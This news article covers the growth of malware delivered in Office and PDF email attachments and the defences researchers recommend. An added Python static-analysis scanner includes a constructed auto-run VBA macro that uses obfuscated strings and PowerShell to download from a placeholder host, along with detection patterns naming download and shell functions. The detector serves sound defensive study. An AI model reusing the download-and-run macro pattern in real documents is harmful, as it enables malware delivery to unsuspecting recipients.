Document-based malware on the rise, businesses warned

Document-based malware spiked in the first quarter of the year, building on a gradual rise in the past year, warn researchers

Nearly half (48%) of all malicious files detected in the past 12 months were some kind of document, an email analysis by researchers at Barracuda Networks has revealed.

More than 300,000 unique malicious documents were identified in the study, which researchers said indicates an alarming rise in the use of document-based malware.

This trend appears to be gaining momentum, with 59% of all malicious files detected in the first quarter of 2019 being documents, compared with 41% in the same period a year ago.

Evidence of this increased use of PDF documents and trusted Microsoft Office files to circumvent traditional firewalls and sandboxes to deliver malware was presented in a recent Cyber threat report by security firm SonicWall.

The report said researchers found threats in more than 47,000 PDFs and almost 51,000 Office files in 2018, representing a growing problem because most security controls cannot identify and mitigate the hidden malware contained in the files.  

In these document-based malware attacks, cyber criminals use email to deliver a document containing malware that is either hidden directly in the document itself or downloaded from an external website by an embedded script.

Common types of malware include viruses, Trojans, spyware, worms and ransomware. In December 2018, a threat report from security firm Malwarebytes warned that the banking trojan/downloader/botnet known as Emotet, along with its commonly seen accomplice TrickBot, mainly use email distribution with malicious Office documents using PowerShell to download and launch the malware.

Most malware is sent as spam to widely circulated email lists, which are sold, traded, aggregated and revised as they move through the dark web, the researchers said.

These lists are then used to send malware, using various social engineering techniques to get users to open an attached malicious document. 

Once the document is opened, either the malware is automatically installed or a heavily obfuscated macro or script is used to download and install it from an external source.

Links or other clickable items are also used, but researchers said that approach is much more common in phishing attacks than malware attacks.

Archive files and script files are the other two most common attachment-based distribution methods for malware, the researchers said, noting that attackers often play tricks with file extensions to try to confuse users and get them to open malicious documents. 

Modern malware attacks are complex and layered, the researchers said, requiring complex systems to detect and block them. To defend against document-based and other malware attacks, they said organisations need to ensure they are using security technologies that include blacklisting, spam filters, phishing detection and advanced firewalls.

The researchers note that spammers are increasingly using their own infrastructure, which means the same IP addresses are often used long enough for software to detect and blacklist them. Even with hacked sites and botnets, it is possible to temporarily block attacks by IP once a large enough volume of spam has been detected.

While many malicious emails appear to be genuine, the researchers said spam filters, phishing-detection systems and related security software can pick up subtle clues and help block potentially threatening messages and attachments from reaching email inboxes.

For emails with malicious documents attached, both static and dynamic code analysis can pick up on indicators that the document is trying to download and run an executable, which no document should ever be doing. The web address for the executable can often be flagged using heuristics or threat intelligence systems, the researchers said, adding that obfuscation detected by static analysis can also indicate whether a document may be suspicious. 
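As an added illustration of the static-analysis indicators described above (not code from the article or from the researchers it cites), the following scanner flags a macro that combines download capability with process launch, hides strings in Chr() chains, or references an external URL. Both macros are constructed samples; the "malicious" one is deliberately non-functional and exists only to exercise the detection logic.

```python
import re

# Constructed VBA macro in the style the article describes: auto-run, Chr()-obfuscated
# URL, download and launch through PowerShell. Not real and not functional as written.
MALICIOUS_MACRO = r'''Sub AutoOpen()
    u = Chr(104) & Chr(116) & Chr(116) & Chr(112) & "://example.invalid/payload.exe"
    Set sh = CreateObject("WScript.Shell")
    sh.Run "powershell -w hidden DownloadFile " & u
End Sub'''
# Constructed benign macro: formats a document, no network or process activity.
BENIGN_MACRO = r'''Sub FormatReport()
    ActiveDocument.Paragraphs(1).Range.Font.Bold = True
End Sub'''

# Static indicators, each tied to a behaviour a document has no business showing.
INDICATORS = {
    "auto-run entry point": r"\b(?:AutoOpen|Auto_Open|Document_Open|Workbook_Open|AutoExec)\b",
    "download capability": r"\b(?:URLDownloadToFile|XMLHTTP|WinHttpRequest|DownloadFile|DownloadString)\b",
    "process launch": r"\bWScript\.Shell\b|\bShell\s*\(|\bpowershell\b|\bcmd\.exe\b",
    "external URL": r"\bhttps?://[^\s\"'&]+",
    "Chr() obfuscation": r"\bChr\(\s*\d+\s*\)\s*&\s*Chr\(",
}

def deobfuscate(code: str) -> str:
    """Turn Chr(n) into literals, then fold "a" & "b" into "ab" until stable."""
    # Chr(n) -> "x" (a Chr(34) quote would need escaping; ignored here for brevity)
    code = re.sub(r"\bChr\(\s*(\d+)\s*\)", lambda m: '"%s"' % chr(int(m.group(1))), code, flags=re.I)
    concat = re.compile(r'"([^"\n]*)"\s*&\s*"([^"\n]*)"')
    while True:
        folded = concat.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', code)
        if folded == code:
            return code
        code = folded

def scan_macro(code: str) -> dict:
    """Return {indicator: sorted matches} seen in the raw or de-obfuscated macro."""
    decoded = deobfuscate(code)
    hits = {}
    for name, pattern in INDICATORS.items():
        found = set(re.findall(pattern, code, re.I)) | set(re.findall(pattern, decoded, re.I))
        if found:
            hits[name] = sorted(found)
    return hits

def is_suspicious(code: str) -> bool:
    """Flag the article's 'download and run' pairing, obfuscation, or an external URL."""
    hits = scan_macro(code)
    download_and_run = "download capability" in hits and "process launch" in hits
    return download_and_run or "Chr() obfuscation" in hits or "external URL" in hits
```

Running the scanner on the constructed sample surfaces the URL only after Chr() folding, which is the kind of obfuscation signal the article says static analysis can pick up even before any download is attempted.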

If a user opens a malicious attachment or clicks a link to a drive-by download, the researchers said an advanced network firewall capable of malware analysis provides a chance to stop the attack by flagging the executable as it tries to pass through.
